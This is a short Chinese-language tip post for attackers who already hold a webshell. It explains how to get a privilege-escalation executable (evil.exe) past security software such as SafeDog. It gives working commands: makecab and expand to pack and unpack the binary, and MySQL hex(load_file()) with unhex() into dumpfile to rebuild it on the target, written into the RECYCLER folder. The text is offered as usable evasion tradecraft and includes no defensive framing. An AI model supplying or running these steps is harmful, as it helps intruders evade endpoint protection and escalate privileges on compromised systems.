在获取到webshell时,往往需要上传exe类型的可执行exp进行提权,但是如果对方装有安全狗等,通过webshell上传是会被拦截的,所以,可以试试以下方法:
一、打包为压缩文件上传解压
这种方法需要可以执行系统命令,话说回来,如果不能执行系统命令,上传提权exp意义也不大
windows系统自带zip,可以通过在本地压缩,webshell里解压释放exp,具体命令如下:
压缩文件:
makecab c:/evil.exe c:/evil.zip
解压文件:
expand c:/evil.zip c:/evil.exe
二、通过mysql等写入
可以通过mysql的hex函数将可执行文件转换为16进制文本字符串,再通过unhex函数转换为可执行文件,具体如下:
本地mysql中执行
select hex(load_file('c:/evil.exe')) into dumpfile 'c:/hex.txt';
目标mysql中执行
select unhex(load_file('C:/RECYCLER/hex.txt')) into dumpfile 'C:/RECYCLER/evil.exe';
小提示:导出文件时,建议使用into dumpfile,因为使用into outfile函数会在行末端写入新行,更致命的是会转义换行符,破坏源2进制文件。